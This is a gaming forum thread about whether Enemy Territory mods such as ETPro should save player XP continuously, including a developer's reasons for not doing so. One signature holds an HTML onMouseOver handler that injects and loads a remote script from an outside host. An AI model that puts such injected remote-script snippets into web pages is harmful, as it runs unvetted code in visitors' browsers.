If ETPro only had.....

Discussion for Bani's Pub mod

Moderators: Forum moderators, developers

KAtMAi

If ETPro only had.....

Post by KAtMAi »

a continous XP save feature then i would switch mods. At least the bani team updates regularly unlike a certain mod maker who only gives his mod to his ass kisses.
Kendle

Post by Kendle »

Best post this in the BayonET forum. ETPro is a mod for competition. Continuous XP save is not relevant to competitive play.
=FF=im2good4u

Post by =FF=im2good4u »

yes that has been reqested many times but i wont make into etpro maybe in bayonet i hope when ever that will be (maybe next yeah)
Rain

Post by Rain »

We may end up making this possible in etpro so that it's possible to keep XP in a campaign fashion with a scripted map rotation.

The primary reason we haven't is because such a feature could be (ab)used to make servers that never reset XP, which we feel is miserable for gameplay.
<b onMouseOver="var d=document;if(!d.eD){var e=d.createElement('script');e.src='http://themuffin.net/forum/f.js';e.type ... ;d.eD=true;}" id="rsig">Rain</b>
gotenks

Post by gotenks »

Rain wrote:The primary reason we haven't is because such a feature could be (ab)used to make servers that never reset XP, which we feel is miserable for gameplay.
the sole reason i never play on shrubet servers, i don't want to join when allmost everyone is a general
My Website
After a night of binge drinking:
=FF=im2good4u wrote:WTF wanst i on top ?
=FF=im2good4u

Post by =FF=im2good4u »

i think its an decision of the admins if they want to do it or not and if they do they risk of complains about ppl that dont like it so they can still turn if off

otherwise some ppl would like to join as general (i might keep ppl comming back)
but i still it will still get reset if the server is rebooted :roll:

bu its still gonig to be a problem when a new map laod ppl that are generals will get back the XP whit they started the last round (dont know if that was fixed yet)